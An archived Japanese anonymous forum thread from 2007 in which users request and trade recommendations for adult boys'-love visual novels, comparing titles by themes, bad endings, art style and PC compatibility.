 攻略対象に1人暴力(系のいじめ)好きなキャラがいるので注意。
 あとグッドEDをのぞくと、消化不良なもやもやする鬱EDが多い。

・birdie
 鬼畜な展開が多い。暴力系もなし。
 シナリオは分岐(差分)がかなり多い。
 グッドEDも存在するけど、それ以外のほとんどのEDが救われない鬱ED。
 カプによってはグッドEDでも完全なハッピーEDではなく鬱要素があったりする。

69 :いけない名無しさん:2007/10/03(水) 04:04:21 ID:???
最近BLゲームにハマりました。
沢山あり過ぎて次に何を買うか悩んでます。
楽しいorオススメありましたら是非教えて下さい

【ジャンル】特になし
【予算】〜1万
【萌え】主人公総受け(リバOK)、鬼畜、スカ、スーツ、精神(人格)破壊、陵辱
【萎え】筋肉受け・中の人が女
【許容】特になし
【プレイ済み】コイビト・スーツ・のーとん・俺下・弄り・仮面・ぷりプリ・学へヴ・冤罪・裸バス(萌え順です
【検討中】鬼畜眼鏡・Lamento・咎犬・ぴよ・そし僕・楽園
【その他】死亡以外だったらバットエンドかなり好きです。
萎え以外だったら基本的に何でも大丈夫です。
検討中以外にでも私に合いそうなのがありましたら是非教えて下さい



70 :いけない名無しさん:2007/10/03(水) 06:31:52 ID:???
>69
つbirdie
鬼畜、スーツ、精神崩壊、陵辱を満たす。萎えはなし。
死亡エンドはありません、絵柄等は公式で確認を。
攻略は今出ているBLGの中でもトップクラスの難易度

71 :いけない名無しさん:2007/10/03(水) 14:41:03 ID:???
>69
花町。
ほぼ主人公総受け、鬼畜陵辱も一応ある。おかしくなっちゃう人もいる。
萎えはなし。文章が独特なことと主人公のブリ喘ぎが大丈夫だったらどうぞ。

検討中のラメと咎狗は鬼畜、(ほぼ)総受け、鬼畜陵辱、人格崩壊あたりを満たすけど
死亡BAD有り。

72 :いけない名無しさん:2007/10/03(水) 16:25:28 ID:???
>>69
検討中の楽園は死亡エンドあるので注意

73 :いけない名無しさん:2007/10/03(水) 16:46:08 ID:???
>69
そし僕もBADエンドは死亡エンド多いよ

74 :いけない名無しさん:2007/10/03(水) 17:56:43 ID:???
>>69
鬼畜眼鏡も(ry

死亡EDありのゲームは多いからキリがないなw


まだ挙がっていないのだとメサイア、玉響はどうだろ。

75 :いけない名無しさん:2007/10/03(水) 20:25:14 ID:???
>69です
沢山のレス有難う御座います。
購入に悩んでいたので助かります。
死亡エンドの方は好きでも嫌いでもない程度なのであっても全然構大丈夫です。
それふまえてバットエンドが濃い作品はありますでしょうか?
ラブよりバット好きなので鬱っぽいのあると良いな…っと

よろしくお願いします

76 :いけない名無しさん:2007/10/03(水) 20:36:20 ID:???
>>75 >>69
ラブよりバッドが好きで欝っぽいのが希望だったら
birdieを推す。


77 :いけない名無しさん:2007/10/03(水) 21:29:49 ID:???
心中・死亡エンドばかりでもいいならFANATICAとか。
主総受、鬼畜、陵辱、精神破壊、スーツ…は19世紀風か

78 :いけない名無しさん:2007/10/03(水) 21:38:50 ID:???
薔薇ノ木もいけるかなあ・・・
オフィシャルに体験版あるよ

79 :いけない名無しさん:2007/10/04(木) 01:21:46 ID:???
>75
検討中の狗はバッドエンドが濃いというか、個性があると思う。
グッドエンドよりもインパクトが強い。
ただ、>71の言うとおり萌えは満たしてるけど、
グッドエンドであっても主要キャラが死ぬ展開が多いので注意。

80 :いけない名無しさん:2007/10/04(木) 15:38:58 ID:???
スカのある作品を教えてください。主人公以外の描写でも可です
【ジャンル】なんでも
【予算】1万円くらい
【萌え】スカ特に大、ボイス有
【プレイ済】修業、メサイア、学園王子、ヘボン、楽園行、あがけ、ニトロ作品、由良作品のーとんも、PIL/作品


81 :いけない名無しさん:2007/10/04(木) 17:37:08 ID:???
>>76
birdieのレビュー見てまわったら好みっぽくって気になりました。
絵がちょっと好みではないのですが…買ってみたいと思います

>>77
FANATICAはやったことあります;;
書き忘れてましたスイマセンorz
萌え要素は1つでも当て嵌まれば何でも良いんですが、それだと沢山有り過ぎますよね…

>>78
情報有難うございます。
早速体験版の方やってみたいと思います

>>79
咎狗は絵がちょっと好みではないのでそこで悩んですが…
バットにインパクトあるならやってみたいと思います。
死亡エンドに関してはは萌えでも萎えでもない、特に気にならない程度なので大丈夫です


皆さんレス有難う御座いました。

頂いた意見を参考に名前上がったやつ順番に買ってみます

82 :いけない名無しさん:2007/10/04(木) 17:39:31 ID:???
>>81です
悩んですが…じゃなく悩んでたんですが…です。

誤字orz

83 :いけない名無しさん:2007/10/05(金) 00:30:11 ID:???
>80
プレイ済の由良と仮面しかないような気がする…

84 :いけない名無しさん:2007/10/06(土) 01:50:52 ID:???
>>80
鬼畜眼鏡に氷入れて(ryというプレイがあったけど
スカという位置づけではなかった。
要するにあまりそこに主眼を置いた描写ではないので、
スカ好きにはぬるいというかスカに見えない気がする。

85 :80:2007/10/06(土) 12:18:15 ID:???
特定のメーカーしか取り扱ない感じですね。メーカーさん感謝して次回作に期待したいと思います。

せっかくなので鬼畜眼鏡ポチってみます。ありがとうございます

86 :いけない名無しさん:2007/10/07(日) 01:58:08 ID:???
>>85
スカといえば蛍2購入特典のイチ思い出した
BLゲーに比べたら結構濃い、と思う
なにぶん絵が濃いのと、蛍クリアしなきゃいけない(クリア時のパスが必要らしい)のが難点だけど


87 :いけない名無しさん:2007/10/07(日) 16:02:59 ID:???
>>86
え、そうだっけ?
自分蛍2のみ買って真っ先にイチやったが普通にスカってたような…
どちらにせよ今はかなり入手困難だけどね

88 :いけない名無しさん:2007/10/07(日) 16:42:17 ID:???
うろおぼえだけどイチだけでも普通にゲームできるはず
たしかパスワードをいれるんだったか何かをすると裏バージョンができる

タイトルにしか出てこない蛍2の主人公の声とイチの声が某好きゲーキャラの中の人だと
ずいぶん後になってから気づいたので大切にしてる

89 :87:2007/10/07(日) 19:11:38 ID:???
そうだったのか
ちょっとそのまま積んでた蛍2崩してくる

90 :いけない名無しさん:2007/10/07(日) 23:33:29 ID:???
【ジャンル】特になし
【予算】なし
【萌え】(できれば)主人公受け、シナリオに定評のあるもの、純愛、社会人、男らしい攻め
【萎え】ショタ、性別受け
【許容】スカ
【プレイ済み】学園ヘブン、鬼畜眼鏡、あがけ
【検討中】lamento、咎狗
【その他】ヘブンの和希・丹羽・成瀬、眼鏡のノーマル×本多、のCPが好きです。
とにかく主人公大好きなキャラに萌えるので、そんなキャラがいるものを探しています。
できればプレイ途中に主人公好きを見たいので、HAPPYEDでラブラブになる・・・
というのとは少し違います。やり方が鬼畜でも主人公好きが感じられればOKです。
何かオススメはありますでしょうか?

91 :いけない名無しさん:2007/10/08(月) 01:17:58 ID:???
検討中の二つは主人公大好き攻めも男らしい攻めもいるのでいいと思うよ。
咎狗の主人公好きは屈折してるけど。

92 :いけない名無しさん:2007/10/08(月) 06:46:27 ID:???
>>90
自分もlamento良いと思う。主人公がこの上なく大好きな攻めと、
カコイイ攻めもいるし、すごく長いけどシナリオもとても良いと思う。

93 :90:2007/10/08(月) 09:51:04 ID:???
レスありがとうございます。

>>91
屈折してたほうがより萌えるかもしれませんw
主人公が少年寄りな外見なので買ってなかったんですが・・・。

>>92
lamentoは咎狗よりいいかな、と思ってるんですが、
どうも皆さんのレビューを見てると踏み切れないw
かなり重たいようですし、私ノーパソなので。(環境は満たしてますが。)
セーブデータ全消え体験とか・・・怖いw

94 :いけない名無しさん:2007/10/08(月) 18:56:45 ID:???
>>90
ノーパソですが動きはあまりデスクトップと変わらないです
(デスクトップでも動きはPS並みだけど)
強制終了はあり。決まった所で落ちるからセーブこまめにで回避してます
ただ話しはgdgdなので期待しなければ猫面白いと思います
そして屈折が好きなら断然狗を押しますw

95 :90:2007/10/08(月) 21:00:21 ID:???
>>94
レスどうもです。
セーブをこまめにしておく、と言う注意点に気をつけてさえおけば許容範囲のようですね。良かった・・・。
猫スキーなので買いたいのに、この点で躊躇してたんですw
おっしゃるように期待せずに気楽に買おうと思いました。

咎狗は、ただ定評があるようだったので検討してたんですが、
主人公大好きキャラがいるなら迷わず買います!



登場キャラの特徴等をネタバレなしでわかりやすく書いてあるサイトは見つけられなかったので、
参考になりました。
もし他にも主人公大好きキャラがいるゲームがあればご教授ください。
レスをくださった皆さん、どうもありがとうございました〜。

96 :いけない名無しさん:2007/10/08(月) 21:06:55 ID:???
>95
閉めてるのに遅レスごめん
私のノートでは一応環境満たしていたけど猫プレイできなかったよ
猫の他にもプレイできなかったゲームあり。
でもデスクトップでもプレイできなかったといってた人がいたから
ノートかどうかが問題じゃないかも。

主人公ダイスキキャラは「親友」とか「片思い」属性に
多くいそうだなと思った。

97 :95:2007/10/08(月) 23:23:19 ID:???
>>96
いえいえ、悩んでるのでレスありがたいです!

lamentoは環境満たしても無理な場合があるんですね・・・。
う〜、悩む〜ww

デスクでも・・・との事ですから、買ってみてPCとの相性を見ないとわからないって事ですよね。
アドバイスどうもです。

主人公大好きキャラは、やってみないとわからなかったりするのでなかなか探せませんw
確かに「親友」ポジションだと多そうですねw


98 :いけない名無しさん:2007/10/09(火) 00:43:32 ID:???
薔薇は主人公好き好きキャラが二人
片方は鬼畜気味で片方は忠犬
玉響にも主人公好き好きキャラが二人
親友とちょっと腹黒系
メサイアもいいかもしれない

99 :97:2007/10/09(火) 01:18:10 ID:???
>>98
うお!詳しいレスどうもです!
脳内インプットしました。
実際やってみた方じゃないとわからない所なのでありがたいです。
一つずつやってみます!!


100 :いけない名無しさん:2007/10/11(木) 04:55:17 ID:???
BLゲーム初めてなのでアドバイスお願いします

【ジャンル】なんでも
【予算】無し 現在入手可能なもの
【萌え】出来ればフルボイス 絵が綺麗 主人公がどちらかというとショタか中性的で総受け 攻めは鬼畜で無理矢理みたいなのが好き  
【萎え】主人公が筋肉質でごつい 主人公がアホ 主人公がやる気まんまん スカ 流血 陰部が透明
【プレイ済み】18禁エロゲ・乙女ゲー
【検討中】鬼畜眼鏡 のーとん  薔薇 咎狗 絶服 メサイア
【その他】とにかくとことんしつこくエロいのがやってみたいんですけどありますかw
ちなみに絵の好みは◎鬼畜眼鏡・咎狗 ○薔薇・絶服の主人公二人 △メサイア ×ヘブン・あがけ

101 :いけない名無しさん:2007/10/11(木) 05:12:43 ID:???
>>100
とにかくエロいのがやりたいならのーとんがオススメ。
でもスカがひっかかるね。軽いのだけど。
あと主人公受けだがBADでは一部リバ有。

102 :いけない名無しさん:2007/10/11(木) 06:48:09 ID:???
>100
「しつこくエロい」ならメサイアいいんじゃない?
無理矢理シチュ多い。一つだけ主人公攻めがあるけど
たいして気にならないと思う。

103 :いけない名無しさん:2007/10/11(木) 09:58:02 ID:???
>>100
コイビト遊戯なんかどうだろう 主人公は中性的でショタっぽい
変態がテーマだからエロもバリエーション豊富だし結構激しい
一部バッドで主人公攻めが2つほどあるけど 
システムも快適で私的にはとても面白かったよ

104 :いけない名無しさん:2007/10/11(木) 12:07:58 ID:???
>>100
鬼畜眼鏡:体験版あり。OPもチェックした方がよい。
安定感があるので、初ボブゲには、お勧め。
主人公の眼鏡側が攻めの人で、総受けじゃないので注意。
陵辱とかエロは、ボブゲにしたら濃い目の方です。
場所とかシュチュエーションに凝っててエロスチルもよかったです。

帝国廉価版(当然、追加ディスク入ったツインパックで)
本編の体験版がある。
主人公は相手によって一部攻めだけど、
その場合の受けキャラは、ショタっぽいコと中性的なコ。
陵辱とかエロは、濃い目で、満足できるかと。但し、スカ(小)ちょっと有り。

105 :いけない名無しさん:2007/10/12(金) 01:43:17 ID:???
相談させてください。

【ジャンル】特になし
【萌え】リバ、ツンデレ、俺様、ナンパ、執着、支配、すれ違い
【萎え】主人公総受け(ニトロの主人公×)、カプ固定
【プレイ済み】薔薇、マスカレード、birdie、カフェリン、スクエア、
弄り、たゆとき、LL、神無、ファナティカ、ヘブン、絶服、冤罪
ラメント、咎狗
【検討中】コイビト遊戯、黒の十字架、鬼畜眼鏡
【その他】エロが濃く、シナリオにボリュームのある
(コミカルよりはシリアスが好き)ゲームを探してます。
あと、執着心・支配欲が強いわりに不器用なキャラが大好物です。
アドバイスよろしくお願いします!

106 :いけない名無しさん:2007/10/12(金) 08:18:18 ID:???
>>105
検討中はどれもいいと思う。
個人的には鬼畜眼鏡が一番当てはまりそうだと思う。
黒十はシリアス、コミカルというかぶっ飛んだシナリオという感じなのでそれでもおkなら。

それ以外だとあがけはだろう?
萌えは網羅していると思う。
バカゲーなところもあるけど、シナリオ自体は結構シリアス。
エロは濃い。

あとはリバなら玉響かなぁ。
萌えのリバ、執着、支配、すれ違いあたりに該当する。
ただ、リバなので少なくはないもののエロが濃いかどうか微妙なのと
シナリオも特にボリュームがあるとは思わなかった。

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)